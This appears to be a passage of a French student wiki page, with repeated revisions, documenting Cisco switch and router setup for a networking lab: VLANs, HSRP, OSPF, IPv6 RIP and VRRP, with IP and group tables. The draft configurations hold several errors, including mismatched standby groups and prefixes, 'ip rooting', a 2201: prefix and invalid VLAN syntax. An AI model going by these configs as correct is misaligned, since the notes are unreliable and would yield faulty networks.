standby 6 preempt
ipv6 address 2001:660:4401:60B7::/64 eui-64
ipv6 enable
ipv6 nd prefix 2001:660:4401:60B7::/64 1000 900
ipv6 nd router-preference High
exit

interface BDI42
ip address 193.48.57.173 255.255.255.240
standby version 2
standby 7 ip 193.48.57.172
standby 7 preempt
ipv6 address 2001:660:4401:60B1::/64 eui-64
ipv6 enable
ipv6 nd prefix 2001:660:4401:60B1::/64 1000 900
ipv6 nd router-preference High
exit

int vlan 130
ip address 192.168.222.1 255.255.255.248
ipv6 address fe80::2 link-local
ipv6 enable
ipv6 rip tpima2a5 enable
exit
ip rooting

exit
write

==== Interconnexion du réseau IPV4 ====

Se le faire expliquer parce que rien compris

configure terminal
ip routing
router ospf 1 //création d'un opsf (Open Shortest Path First)
router-id 10.60.1.254
log-adjacency-changes
summary-address 193.48.57.160 255.255.255.240 //donne l'addresse IP la plus base du réseau routé
summary-address 10.60.0.1 255.255.0.0 not-advertise //donne l'addresse Ip la plus base du réseau non routé/ privé
redistribute connected subnets
network 192.168.222.8 0.0.0.7 area 1
exit
exit
write

==== Interconnexion du réseau IPV6 ====

conf t
ipv6 router rip tpima2a5 //Création d'une route IPV6 sous le nom tpima2a5
redistribute connected metric 1
redistribute rip 1 metric 1
redistribute static metric 1
exit
exit
write

==== Sécurisation du réseau ====

Question pour Redon addresse Ip à définir

conf t
int XXXX
ip address 10.10.10.2 255.255.255.0
vrrp 1 ip 10.10.10.3
vrrp 1 preempt //Activation de la préemption, si jamais le routeur tombe en panne, l'autre prend sa place
vrrp 1 priority 100 //Dans le vvrp n°1 on définit la priorité à 100, plus la priorité est élevé plus il sera sollicité
exit
exit
write

=== Configuration du router E306 ===

===== Connexion =====

Pour accéder au routeur, nous avons utilisé minicom avec un USB directement branché sur la prise console du commutateur :

minicom -os ( avec '''ttyUSB0''', une vitesse de transfert de '''9600 bauds''' et le ''''flow control désactivé''') // les paramètres sont modifiable directement depuis les options de minicom

===== Commande de base =====

Ce sont exactement les mêmes que celles utilisées pour les commutateurs

==== Configuration des ports ====

====== Vers les commutateurs ======

La configuration est la même pour les 2 ports correspondant aux commutateurs
Nous avons besoin de 6 Vlan pour nos groupes et d'un Vlan d'interconnexio

conf t
interface Vlan2
ip address 10.60.1.253 255.255.255.0
ipv6 address 2001:660:4401:60B2::/64 eui-64
ipv6 enable
ipv6 nd prefix 2001:660:4401:60B2::/64 1000 900
ipv6 nd router-preference High
standby version 2
standby 2 ip 10.60.1.252
standby 2 preempt
exit

interface Vlan3
ip address 10.60.2.253 255.255.255.0
ipv6 address 2001:660:4401:60B3::/64 eui-64
ipv6 enable
ipv6 nd prefix 2001:660:4401:60B3::/64 1000 900
ipv6 nd router-preference High
standby version 2
standby 3 ip 10.60.2.252
standby 3 preempt
exit

interface Vlan4
ip address 10.60.3.253 255.255.255.0
ipv6 address 2001:660:4401:60B4::/64 eui-64
ipv6 enable
ipv6 nd prefix 2001:660:4401:60B4::/64 1000 900
ipv6 nd router-preference High
standby version 2
standby 4 ip 10.60.3.252
standby 4 preempt
exit

interface Vlan5
ip address 10.60.4.253 255.255.255.0
ipv6 address 2001:660:4401:60B5::/64 eui-64
ipv6 enable
ipv6 nd prefix 2001:660:4401:60B5::/64 1000 900
ipv6 nd router-preference High
standby version 2
standby 5 ip 10.60.4.252
standby 5 preempt
exit

interface Vlan6
ip address 10.60.5.253 255.255.255.0
ipv6 address 2001:660:4401:60B6::/64 eui-64
ipv6 enable
ipv6 nd prefix 2001:660:4401:60B6::/64 1000 900
ipv6 nd router-preference High
standby version 2
standby 6 ip 10.60.5.252
standby 6 preempt
exit

interface Vlan7
ip address 10.60.6.253 255.255.255.0
ipv6 address 2201:660:4401:60B7::/64 eui-64
ipv6 enable
ipv6 nd prefix 2201:660:4401:60B7::/64 1000 900
ipv6 nd router-preference High
standby version 2
standby 7 ip 10.60.6.252
standby 7 preempt
exit

interface Vlan42
ip address 193.48.57.174 255.255.255.0
ipv6 address 2001:660:4401:60B1::/64 eui-64
ipv6 enable
ipv6 nd prefix 2001:660:4401:60B1::/64 1000 900
ipv6 nd router-preference High
standby version 2
standby 42 ip 193.48.57.172
standby 42 preempt
exit

interface Vlan130
ip address 192.168.222.2 255.255.255.248
ipv6 address FE80::42:2 link-local
ipv6 enable
exit

exit
write

==== Interconnexion du réseau IPV4 ====

configure terminal
router ospf 1 //création d'un opsf (Open Shortest Path First)
router-id 10.60.1.253
log-adjacency-changes
summary-address 193.48.57.160 255.255.255.240 //donne l'addresse IP la plus base du réseau routé
summary-address 10.60.0.1 255.255.0.0 not-advertise //donne l'addresse Ip la plus base du réseau non routé/ privé
redistribute connected subnets
network 192.168.222.8 0.0.0.7 area 1
exit
exit
write

==== Interconnexion du réseau IPV6 ====

conf t
ipv6 router rip tpima2a5 //Création d'une route IPV6 sous le nom tpima2a5
redistribute connected metric 1
redistribute rip 1 metric 1
redistribute static metric 1
exit
exit
write

TP système & reseau IMA2a5 2019/2020

2019-11-28T17:00:32Z

Jcabrald : /* Machines virtuelles */

== Introduction ==

Bienvenue sur l'article wikipédia de la promotion 2017 - 2020 de la section IMA2A5. Cette page traite du sujet de protocole avancé vu en semestre 9.
Le lien vers le sujet est : [https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/reseau.html https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/reseau.html]

== Répartition des binômes ==

{| class="wikitable" style="text-align:center"
! Page du groupe !! Prénom & NOM !! Nom de domaine acheté !! Certificat associé ?
|-
| [[ TP sysres IMA2a5 2019/2020 G1 | Cahier groupe n°1]]
| Fabien CAVALIER & Maxime HIRT
|[https://ima2a5-zerofun.site https://ima2a5-zerofun.site ]
|
|-
| [[ TP sysres IMA2a5 2019/2020 G2 | Cahier groupe n°2]]
| Ekaterina ISHCHUK & Loick MOLLET
| [https://ima2a5-mol-ish.site https://ima2a5-mol-ish.site]
|
|-
| [[ TP sysres IMA2a5 2019/2020 G3 | Cahier groupe n°3]]
| Quentin WEISBECKER & Pascal COINT
|[https://ima2a5-rex4ever.site https://ima2a5-rex4ever.site]
|[https://wiki-ima.plil.fr/mediawiki//index.php/TP_sysres_IMA2a5_2019/2020_G3#Affectation_du_certificat_sur_Gandi.net voir ici]
|-
| [[ TP sysres IMA2a5 2019/2020 G4 | Cahier groupe n°4]]
| Malick SECK & Gael WATBLED
|[https://ima2a5-wateck.site https://ima2a5-wateck.site]
|
|-
| [[ TP sysres IMA2a5 2019/2020 G5 | Cahier groupe n°5]]
| Quentin VERNE & Adrien MONFILLIETTE
|[https://ima2a5-nofun.site https://ima2a5-nofun.site]
|
|-
| [[ TP sysres IMA2a5 2019/2020 G6 | Cahier groupe n°6]]
| Hamza FAHIM & Jorge CABRAL-DAS-DORES
| [https://ima2a5-4fun.site https://ima2a5-4fun.site]
|
|-
|}

== Table IP VLANs ==

{| class="wikitable" style="text-align:center"
! Nom !! Vlan !! Réseau IPV4 (Routé) !! Réseau IPV6 !! IP Routeur 1 !! IP Routeur 2 !! IP Routeur Virtuel !! IPv4 VLAN Wi-Fi (non routé)
|-
|Xen
|42
|193.48.57.160/28
|2001:660:4401:60B1::/64
|193.48.57.174
|193.48.57.173
|193.48.57.172
| ****
|-
|Groupe 1
|2
| ****
|2001:660:4401:60B2::/64
|10.60.1.254
|10.60.1.253
|10.60.1.252
|10.60.1.0/16
|-
|Groupe 2
|3
| ****
|2001:660:4401:60B3::/64
|10.60.2.254
|10.60.2.253
|10.60.2.252
|10.60.2.0/16
|-
|Groupe 3
|4
| ****
|2001:660:4401:60B4::/64
|10.60.3.254
|10.60.3.253
|10.60.3.252
|10.60.3.0/16
|-
|Groupe 4
|5
| ****
|2001:660:4401:60B5::/64
|10.60.4.254
|10.60.4.253
|10.60.4.252
|10.60.4.0/16
|-
|Groupe 5
|6
| ****
|2001:660:4401:60B6::/64
|10.60.5.254
|10.60.5.253
|10.60.5.252
|10.60.5.0/16
|-
|Groupe 6
|7
| ****
|2001:660:4401:60B7::/64
|10.60.6.254
|10.60.6.253
|10.60.6.252
|10.60.6.0/16
|-
|}

== Architecture matérielle ==

[[Fichier:Archi_IMA2A5.jpg|500px|center|thumb|© Copyright Minou]]

== Machines virtuelles ==

{| class="wikitable" style="text-align:center"
!Groupe !! Nom de la VM !! IP de la VM
|-
|Groupe 1
|ima2a5-zerofun
|193.48.57.161/28
|-
|Groupe 2
|ima2a5-mol-ish
|193.48.57.162/28
|-
|Groupe 3
|ima2a5-rex4ever
|193.48.57.163/28
|-
|Groupe 4
|ima2a5-wateck
|193.48.57.164/28
|-
|Groupe 5
|ima2a5-nofun
|193.48.57.165/28
|-
|Groupe 6
|ima2a5-4fun
|193.48.57.166/28
|-
|}

== Bornes Wi-Fi ==

{| class="wikitable"
!Groupe !! Nom de la VM !! Nom SSID !! Numéro Vlan Wifi ( SSID )
|-
|Groupe 1
|ima2a5-zerofun
|SSID_ima2a5-zerofun
|2
|-
|Groupe 2
|ima2a5-mol-ish
|SSID_ima2a5-mol-ish
|3
|-
|Groupe 3
|ima2a5-rex4ever
|SSID_ima2a5-rex4ever
|4
|-
|Groupe 4
|ima2a5-wateck
|SSID_ima2a5-wateck
|5
|-
|Groupe 5
|ima2a5-nofun
|SSID_ima2a5-nofun
|6
|-
|Groupe 6
|ima2a5-4fun
|SSID_ima2a5-4fun
|7
|-
|}

== Architecture Réseau ==

Dans cette partie, vous trouverez comment nous avons configuré les routeurs ainsi que les commutateurs qui se trouve dans les salles E304 et E306.

=== Configuration des 2 commutateurs ===

===== Connexion =====

Pour accéder au commutateur, nous avons utilisé minicom avec un cable série directement branché sur la prise console du commutateur :

minicom -os ( avec '''ttyUSB0''', une vitesse de transfert de '''9600 bauds''' et le '''flow control désactivé''') // les paramètres sont modifiable directement depuis les options de minicom

===== Commande de base =====

Voici quelque commandes de base qui nous ont servi pour la configuration des commutateurs

enable // passage en admin pour pouvoir accéder aux données du commutateur

write // Sauvegarde de la configuration et l’implanter dans le commutateur

show interface status OU sh int status // Montre l'état de toutes les interfaces présentes sur le commutateur ainsi que les données associées

configuration terminal // permets d'accéder aux interfaces et ainsi pouvoir les modifier

exit // permets de sortir du configurateur actuel (par exemple sortir de l'interface)

==== Configuration des ports du commutateur ====

Nous avons 4 connexions qui sont dirigées vers le commutateur de la salle E304 ainsi que celui en E306
- Un lien vers le routeur
- Un lien vers la borne wifi
- Un lien vers Corduan
- Un lien vers l'autre commutateur

{| class="wikitable" style="text-align: center;width: 85%;margin: auto;"
! Connexion !! E304 !! E306
|-
! scope="row" style="width: 20%"|Corduan
|style="width: 40%"| A remplir !
|style="width: 40%"| A remplir !
|-
! scope="row" style="width: 20%"|Borne Wifi
|style="width: 40%"| A remplir !
|style="width: 40%"| A remplir !
|-
! scope="row" style="width: 20%"|Commutateur
|style="width: 40%"| A remplir !
|style="width: 40%"| A remplir !
|-
! scope="row" style="width: 20%"|Router
|style="width: 40%"| A remplir !
|style="width: 40%"| A remplir !
|-
|}
}

===== Création du lien pour la borne wifi =====

enable
configure terminal (ou conf t)
interface XXXX (ou int XXXX)
switchport //Rendre accessible la modification du port
switchport trunk encapsulation dot1q //Encapsule avec la trame le numéro du Vlan associé, ce qui permettra de d'avoir de quel équipement viens le paquet ainsi la réponse sera dirigé vers le bon port
switchport mode trunk //Configure le port du switch en mode trunk, ce qui permets de ne pas avoir de restriction sur les Vlan, tous les Vlan peuvent passer à travers ce port
no shut //Démarre le port ou de le garder actif
exit
exit
write

===== Création du lien pour Corduan =====

enable
configure terminal
interface XXXX
switchport
switchport mode access //Rendre modifiable le port
switchport access vlan42 //Autoriser le vlan 42 à transister à travers ce port
no shutdown
exit
exit
write

===== Création du lien pour le router =====

enable
configure terminal (ou conf t)
interface XXXX (ou int XXXX)
switchport
switchport trunk encapsulation dot1q
switchport mode trunk
no shut
exit
exit
write

===== Création du lien pour l'autre commutateur =====

enable
configure terminal (ou conf t)
interface XXXX (ou int XXXX)
switchport
switchport trunk encapsulation dot1q
switchport mode trunk
no shut
exit
exit
write

===== Création des Vlan =====

enable
conf t
vlan 42
name Corduan
exit
exit
write

enable
conf t
vlan 2 à 7
name groupe 1 à 6
exit
exit
write

enable
conf t
vlan 130
name interconnexion
exit
exit
write

Pour supprimer un vlan il suffit de faire :
no vlan X

=== Configuration du router E304 ===

===== Connexion =====

Pour accéder au routeur, nous avons utilisé minicom avec un USB directement branché sur la prise console du commutateur :

minicom -os ( avec '''ttyACM0''', une vitesse de transfert de '''9600 bauds''' et le ''''flow control désactivé''') // les paramètres sont modifiable directement depuis les options de minicom

===== Commande de base =====

Ce sont exactement les mêmes que celles utilisées pour les commutateurs

==== Configuration des ports ====

====== Vers les commutateurs ======

La configuration est la même pour les 2 ports correspondant aux commutateurs
Nous avons besoin de 6 Vlan pour nos groupes et d'un Vlan d'interconnexion

enable

configure terminal

interface XXXX
no ip address //Pas d'addresse IP associé
negotiation auto //Détermine automatiquement la vitesse de transfert
media-type RJ45 //Type de connexion (ici RJ45)

Voici les vlan associé à nos groupes :

service instance 2 ethernet // création d'un vlan 2 dans cette interface
encapsulation dot1q 2 // Permets d'assurer une continuité d'un VLAN issue d'un switch sur un routeur via un lien trunk
rewrite ingress tag pop 1 symmetric // retire le tag du vlan
bridge-domain 2 //création d'un bridge domaine interface (BDI) attribué au chiffre 2

service instance 3 ethernet
encapsulation dot1q 3
rewrite ingress tag pop 1 symmetric
bridge-domain 3

service instance 4 ethernet
encapsulation dot1q 4
rewrite ingress tag pop 1 symmetric
bridge-domain 4

service instance 5 ethernet
encapsulation dot1q 5
rewrite ingress tag pop 1 symmetric
bridge-domain 5

service instance 6 ethernet
encapsulation dot1q 6
rewrite ingress tag pop 1 symmetric
bridge-domain 6

service instance 7 ethernet
encapsulation dot1q 7
rewrite ingress tag pop 1 symmetric
bridge-domain 7

Voici le vlan associé à l'interconnexion :

service instance 42 ethernet
encapsulation dot1q 42
rewrite ingress tag pop 1 symmetric
bridge-domain 42

====== Vers le SR 32 ======
interface XXXX
no ip address
negotiation auto
service instance 130 ethernet
encapsulation dot1q 130
bridge-domain 130

===== Configuration des BDI =====

conf t
interface BDI2
ip address 10.60.1.254 255.255.255.000 //Attribut l'addresse IPV4 pour le routeur ainsi que son mask
standby version 2 //Activation du HSRP (Host service Routing protocole) version 2 plus stable que la 1
standby 3 ip 10.60.1.252 //Donne l'addresse IPV4 du routeur virtuelle pour le HSRP
standby 3 preempt // Activation du HSRP
ipv6 address 2001:660:4401:60B3::/64 eui-64 //Attribut l'addresse IPV6
ipv6 enable //Active l'addressage IPV6
ipv6 nd prefix 2001:660:4401:60B3::/64 1000 900 //Donner un préfixe IPV6 à chaque machine
ipv6 nd router-preference high //IPV6 sera la route de préférence par défaut avec une forte probabilitée
exit

interface BDI3
ip address 10.60.2.254 255.255.255.000
standby version 2
standby 3 ip 10.60.2.252
standby 3 preempt
ipv6 address 2001:660:4401:60B3::/64 eui-64
ipv6 enable
ipv6 nd prefix 2001:660:4401:60B3::/64 1000 900
ipv6 nd router-preference High
exit

interface BDI4
ip address 10.60.3.254 255.255.255.000
standby version 2
standby 4 ip 10.60.3.252
standby 4 preempt
ipv6 address 2001:660:4401:60B4::/64 eui-64
ipv6 enable
ipv6 nd prefix 2001:660:4401:60B4::/64 1000 900
ipv6 nd router-preference High
exit

interface BDI5
ip address 10.60.4.254 255.255.255.000
standby version 2
standby 5 ip 10.60.4.252
standby 5 preempt
ipv6 address 2001:660:4401:60B5::/64 eui-64
ipv6 enable
ipv6 nd prefix 2001:660:4401:60B5::/64 1000 900
ipv6 nd router-preference High
exit

interface BDI6
ip address 10.60.5.254 255.255.255.000
standby version 2
standby 6 ip 10.60.5.252
standby 6 preempt
ipv6 address 2001:660:4401:60B6::/64 eui-64
ipv6 enable
ipv6 nd prefix 2001:660:4401:60B6::/64 1000 900
ipv6 nd router-preference High
exit

interface BDI7
ip address 10.60.6.254 255.255.255.000
standby version 2
standby 6 ip 10.60.6.252
standby 6 preempt
ipv6 address 2001:660:4401:60B7::/64 eui-64
ipv6 enable
ipv6 nd prefix 2001:660:4401:60B7::/64 1000 900
ipv6 nd router-preference High
exit

interface BDI42
ip address 193.48.57.173 255.255.255.240
standby version 2
standby 7 ip 193.48.57.172
standby 7 preempt
ipv6 address 2001:660:4401:60B1::/64 eui-64
ipv6 enable
ipv6 nd prefix 2001:660:4401:60B1::/64 1000 900
ipv6 nd router-preference High
exit

int vlan 130
ip address 192.168.222.1 255.255.255.248
ipv6 address fe80::2 link-local
ipv6 enable
ipv6 rip tpima2a5 enable
exit
ip rooting

exit
write

==== Interconnexion du réseau IPV4 ====

Se le faire expliquer parce que rien compris

configure terminal
ip routing
router ospf 1 //création d'un opsf (Open Shortest Path First)
router-id 10.60.1.254
log-adjacency-changes
summary-address 193.48.57.160 255.255.255.240 //donne l'addresse IP la plus base du réseau routé
summary-address 10.60.0.1 255.255.0.0 not-advertise //donne l'addresse Ip la plus base du réseau non routé/ privé
redistribute connected subnets
network 192.168.222.8 0.0.0.7 area 1
exit
exit
write

==== Interconnexion du réseau IPV6 ====

conf t
ipv6 router rip tpima2a5 //Création d'une route IPV6 sous le nom tpima2a5
redistribute connected metric 1
redistribute rip 1 metric 1
redistribute static metric 1
exit
exit
write

==== Sécurisation du réseau ====

Question pour Redon addresse Ip à définir

conf t
int XXXX
ip address 10.10.10.2 255.255.255.0
vrrp 1 ip 10.10.10.3
vrrp 1 preempt //Activation de la préemption, si jamais le routeur tombe en panne, l'autre prend sa place
vrrp 1 priority 100 //Dans le vvrp n°1 on définit la priorité à 100, plus la priorité est élevé plus il sera sollicité
exit
exit
write

=== Configuration du router E306 ===

===== Connexion =====

Pour accéder au routeur, nous avons utilisé minicom avec un USB directement branché sur la prise console du commutateur :

minicom -os ( avec '''ttyUSB0''', une vitesse de transfert de '''9600 bauds''' et le ''''flow control désactivé''') // les paramètres sont modifiable directement depuis les options de minicom

===== Commande de base =====

Ce sont exactement les mêmes que celles utilisées pour les commutateurs

==== Configuration des ports ====

====== Vers les commutateurs ======

La configuration est la même pour les 2 ports correspondant aux commutateurs
Nous avons besoin de 6 Vlan pour nos groupes et d'un Vlan d'interconnexio

conf t
interface Vlan2
ip address 10.60.1.253 255.255.255.0
ipv6 address 2001:660:4401:60B2::/64 eui-64
ipv6 enable
ipv6 nd prefix 2001:660:4401:60B2::/64 1000 900
ipv6 nd router-preference High
standby version 2
standby 2 ip 10.60.1.252
standby 2 preempt
exit

interface Vlan3
ip address 10.60.2.253 255.255.255.0
ipv6 address 2001:660:4401:60B3::/64 eui-64
ipv6 enable
ipv6 nd prefix 2001:660:4401:60B3::/64 1000 900
ipv6 nd router-preference High
standby version 2
standby 3 ip 10.60.2.252
standby 3 preempt
exit

interface Vlan4
ip address 10.60.3.253 255.255.255.0
ipv6 address 2001:660:4401:60B4::/64 eui-64
ipv6 enable
ipv6 nd prefix 2001:660:4401:60B4::/64 1000 900
ipv6 nd router-preference High
standby version 2
standby 4 ip 10.60.3.252
standby 4 preempt
exit

interface Vlan5
ip address 10.60.4.253 255.255.255.0
ipv6 address 2001:660:4401:60B5::/64 eui-64
ipv6 enable
ipv6 nd prefix 2001:660:4401:60B5::/64 1000 900
ipv6 nd router-preference High
standby version 2
standby 5 ip 10.60.4.252
standby 5 preempt
exit

interface Vlan6
ip address 10.60.5.253 255.255.255.0
ipv6 address 2001:660:4401:60B6::/64 eui-64
ipv6 enable
ipv6 nd prefix 2001:660:4401:60B6::/64 1000 900
ipv6 nd router-preference High
standby version 2
standby 6 ip 10.60.5.252
standby 6 preempt
exit

interface Vlan7
ip address 10.60.6.253 255.255.255.0
ipv6 address 2201:660:4401:60B7::/64 eui-64
ipv6 enable
ipv6 nd prefix 2201:660:4401:60B7::/64 1000 900
ipv6 nd router-preference High
standby version 2
standby 7 ip 10.60.6.252
standby 7 preempt
exit

interface Vlan42
ip address 193.48.57.174 255.255.255.0
ipv6 address 2001:660:4401:60B1::/64 eui-64
ipv6 enable
ipv6 nd prefix 2001:660:4401:60B1::/64 1000 900
ipv6 nd router-preference High
standby version 2
standby 42 ip 193.48.57.172
standby 42 preempt
exit

interface Vlan130
ip address 192.168.222.2 255.255.255.248
ipv6 address FE80::42:2 link-local
ipv6 enable
exit

exit
write

==== Interconnexion du réseau IPV4 ====

configure terminal
router ospf 1 //création d'un opsf (Open Shortest Path First)
router-id 10.60.1.253
log-adjacency-changes
summary-address 193.48.57.160 255.255.255.240 //donne l'addresse IP la plus base du réseau routé
summary-address 10.60.0.1 255.255.0.0 not-advertise //donne l'addresse Ip la plus base du réseau non routé/ privé
redistribute connected subnets
network 192.168.222.8 0.0.0.7 area 1
exit
exit
write

==== Interconnexion du réseau IPV6 ====

conf t
ipv6 router rip tpima2a5 //Création d'une route IPV6 sous le nom tpima2a5
redistribute connected metric 1
redistribute rip 1 metric 1
redistribute static metric 1
exit
exit
write

TP système & reseau IMA2a5 2019/2020

2019-11-28T17:00:07Z

Jcabrald : /* Répartition des binômes */

== Introduction ==

Bienvenue sur l'article wikipédia de la promotion 2017 - 2020 de la section IMA2A5. Cette page traite du sujet de protocole avancé vu en semestre 9.
Le lien vers le sujet est : [https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/reseau.html https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/reseau.html]

== Répartition des binômes ==

{| class="wikitable" style="text-align:center"
! Page du groupe !! Prénom & NOM !! Nom de domaine acheté !! Certificat associé ?
|-
| [[ TP sysres IMA2a5 2019/2020 G1 | Cahier groupe n°1]]
| Fabien CAVALIER & Maxime HIRT
|[https://ima2a5-zerofun.site https://ima2a5-zerofun.site ]
|
|-
| [[ TP sysres IMA2a5 2019/2020 G2 | Cahier groupe n°2]]
| Ekaterina ISHCHUK & Loick MOLLET
| [https://ima2a5-mol-ish.site https://ima2a5-mol-ish.site]
|
|-
| [[ TP sysres IMA2a5 2019/2020 G3 | Cahier groupe n°3]]
| Quentin WEISBECKER & Pascal COINT
|[https://ima2a5-rex4ever.site https://ima2a5-rex4ever.site]
|[https://wiki-ima.plil.fr/mediawiki//index.php/TP_sysres_IMA2a5_2019/2020_G3#Affectation_du_certificat_sur_Gandi.net voir ici]
|-
| [[ TP sysres IMA2a5 2019/2020 G4 | Cahier groupe n°4]]
| Malick SECK & Gael WATBLED
|[https://ima2a5-wateck.site https://ima2a5-wateck.site]
|
|-
| [[ TP sysres IMA2a5 2019/2020 G5 | Cahier groupe n°5]]
| Quentin VERNE & Adrien MONFILLIETTE
|[https://ima2a5-nofun.site https://ima2a5-nofun.site]
|
|-
| [[ TP sysres IMA2a5 2019/2020 G6 | Cahier groupe n°6]]
| Hamza FAHIM & Jorge CABRAL-DAS-DORES
| [https://ima2a5-4fun.site https://ima2a5-4fun.site]
|
|-
|}

== Table IP VLANs ==

{| class="wikitable" style="text-align:center"
! Nom !! Vlan !! Réseau IPV4 (Routé) !! Réseau IPV6 !! IP Routeur 1 !! IP Routeur 2 !! IP Routeur Virtuel !! IPv4 VLAN Wi-Fi (non routé)
|-
|Xen
|42
|193.48.57.160/28
|2001:660:4401:60B1::/64
|193.48.57.174
|193.48.57.173
|193.48.57.172
| ****
|-
|Groupe 1
|2
| ****
|2001:660:4401:60B2::/64
|10.60.1.254
|10.60.1.253
|10.60.1.252
|10.60.1.0/16
|-
|Groupe 2
|3
| ****
|2001:660:4401:60B3::/64
|10.60.2.254
|10.60.2.253
|10.60.2.252
|10.60.2.0/16
|-
|Groupe 3
|4
| ****
|2001:660:4401:60B4::/64
|10.60.3.254
|10.60.3.253
|10.60.3.252
|10.60.3.0/16
|-
|Groupe 4
|5
| ****
|2001:660:4401:60B5::/64
|10.60.4.254
|10.60.4.253
|10.60.4.252
|10.60.4.0/16
|-
|Groupe 5
|6
| ****
|2001:660:4401:60B6::/64
|10.60.5.254
|10.60.5.253
|10.60.5.252
|10.60.5.0/16
|-
|Groupe 6
|7
| ****
|2001:660:4401:60B7::/64
|10.60.6.254
|10.60.6.253
|10.60.6.252
|10.60.6.0/16
|-
|}

== Architecture matérielle ==

[[Fichier:Archi_IMA2A5.jpg|500px|center|thumb|© Copyright Minou]]

== Machines virtuelles ==

{| class="wikitable"
!Groupe !! Nom de la VM !! IP de la VM
|-
|Groupe 1
|ima2a5-zerofun
|193.48.57.161/28
|-
|Groupe 2
|ima2a5-mol-ish
|193.48.57.162/28
|-
|Groupe 3
|ima2a5-rex4ever
|193.48.57.163/28
|-
|Groupe 4
|ima2a5-wateck
|193.48.57.164/28
|-
|Groupe 5
|ima2a5-nofun
|193.48.57.165/28
|-
|Groupe 6
|ima2a5-4fun
|193.48.57.166/28
|-
|}

== Bornes Wi-Fi ==

{| class="wikitable"
!Groupe !! Nom de la VM !! Nom SSID !! Numéro Vlan Wifi ( SSID )
|-
|Groupe 1
|ima2a5-zerofun
|SSID_ima2a5-zerofun
|2
|-
|Groupe 2
|ima2a5-mol-ish
|SSID_ima2a5-mol-ish
|3
|-
|Groupe 3
|ima2a5-rex4ever
|SSID_ima2a5-rex4ever
|4
|-
|Groupe 4
|ima2a5-wateck
|SSID_ima2a5-wateck
|5
|-
|Groupe 5
|ima2a5-nofun
|SSID_ima2a5-nofun
|6
|-
|Groupe 6
|ima2a5-4fun
|SSID_ima2a5-4fun
|7
|-
|}

== Architecture Réseau ==

Dans cette partie, vous trouverez comment nous avons configuré les routeurs ainsi que les commutateurs qui se trouve dans les salles E304 et E306.

=== Configuration des 2 commutateurs ===

===== Connexion =====

Pour accéder au commutateur, nous avons utilisé minicom avec un cable série directement branché sur la prise console du commutateur :

minicom -os ( avec '''ttyUSB0''', une vitesse de transfert de '''9600 bauds''' et le '''flow control désactivé''') // les paramètres sont modifiable directement depuis les options de minicom

===== Commande de base =====

Voici quelque commandes de base qui nous ont servi pour la configuration des commutateurs

enable // passage en admin pour pouvoir accéder aux données du commutateur

write // Sauvegarde de la configuration et l’implanter dans le commutateur

show interface status OU sh int status // Montre l'état de toutes les interfaces présentes sur le commutateur ainsi que les données associées

configuration terminal // permets d'accéder aux interfaces et ainsi pouvoir les modifier

exit // permets de sortir du configurateur actuel (par exemple sortir de l'interface)

==== Configuration des ports du commutateur ====

Nous avons 4 connexions qui sont dirigées vers le commutateur de la salle E304 ainsi que celui en E306
- Un lien vers le routeur
- Un lien vers la borne wifi
- Un lien vers Corduan
- Un lien vers l'autre commutateur

{| class="wikitable" style="text-align: center;width: 85%;margin: auto;"
! Connexion !! E304 !! E306
|-
! scope="row" style="width: 20%"|Corduan
|style="width: 40%"| A remplir !
|style="width: 40%"| A remplir !
|-
! scope="row" style="width: 20%"|Borne Wifi
|style="width: 40%"| A remplir !
|style="width: 40%"| A remplir !
|-
! scope="row" style="width: 20%"|Commutateur
|style="width: 40%"| A remplir !
|style="width: 40%"| A remplir !
|-
! scope="row" style="width: 20%"|Router
|style="width: 40%"| A remplir !
|style="width: 40%"| A remplir !
|-
|}
}

===== Création du lien pour la borne wifi =====

enable
configure terminal (ou conf t)
interface XXXX (ou int XXXX)
switchport //Rendre accessible la modification du port
switchport trunk encapsulation dot1q //Encapsule avec la trame le numéro du Vlan associé, ce qui permettra de d'avoir de quel équipement viens le paquet ainsi la réponse sera dirigé vers le bon port
switchport mode trunk //Configure le port du switch en mode trunk, ce qui permets de ne pas avoir de restriction sur les Vlan, tous les Vlan peuvent passer à travers ce port
no shut //Démarre le port ou de le garder actif
exit
exit
write

===== Création du lien pour Corduan =====

enable
configure terminal
interface XXXX
switchport
switchport mode access //Rendre modifiable le port
switchport access vlan42 //Autoriser le vlan 42 à transister à travers ce port
no shutdown
exit
exit
write

===== Création du lien pour le router =====

enable
configure terminal (ou conf t)
interface XXXX (ou int XXXX)
switchport
switchport trunk encapsulation dot1q
switchport mode trunk
no shut
exit
exit
write

===== Création du lien pour l'autre commutateur =====

enable
configure terminal (ou conf t)
interface XXXX (ou int XXXX)
switchport
switchport trunk encapsulation dot1q
switchport mode trunk
no shut
exit
exit
write

===== Création des Vlan =====

enable
conf t
vlan 42
name Corduan
exit
exit
write

enable
conf t
vlan 2 à 7
name groupe 1 à 6
exit
exit
write

enable
conf t
vlan 130
name interconnexion
exit
exit
write

Pour supprimer un vlan il suffit de faire :
no vlan X

=== Configuration du router E304 ===

===== Connexion =====

Pour accéder au routeur, nous avons utilisé minicom avec un USB directement branché sur la prise console du commutateur :

minicom -os ( avec '''ttyACM0''', une vitesse de transfert de '''9600 bauds''' et le ''''flow control désactivé''') // les paramètres sont modifiable directement depuis les options de minicom

===== Commande de base =====

Ce sont exactement les mêmes que celles utilisées pour les commutateurs

==== Configuration des ports ====

====== Vers les commutateurs ======

La configuration est la même pour les 2 ports correspondant aux commutateurs
Nous avons besoin de 6 Vlan pour nos groupes et d'un Vlan d'interconnexion

enable

configure terminal

interface XXXX
no ip address //Pas d'addresse IP associé
negotiation auto //Détermine automatiquement la vitesse de transfert
media-type RJ45 //Type de connexion (ici RJ45)

Voici les vlan associé à nos groupes :

service instance 2 ethernet // création d'un vlan 2 dans cette interface
encapsulation dot1q 2 // Permets d'assurer une continuité d'un VLAN issue d'un switch sur un routeur via un lien trunk
rewrite ingress tag pop 1 symmetric // retire le tag du vlan
bridge-domain 2 //création d'un bridge domaine interface (BDI) attribué au chiffre 2

service instance 3 ethernet
encapsulation dot1q 3
rewrite ingress tag pop 1 symmetric
bridge-domain 3

service instance 4 ethernet
encapsulation dot1q 4
rewrite ingress tag pop 1 symmetric
bridge-domain 4

service instance 5 ethernet
encapsulation dot1q 5
rewrite ingress tag pop 1 symmetric
bridge-domain 5

service instance 6 ethernet
encapsulation dot1q 6
rewrite ingress tag pop 1 symmetric
bridge-domain 6

service instance 7 ethernet
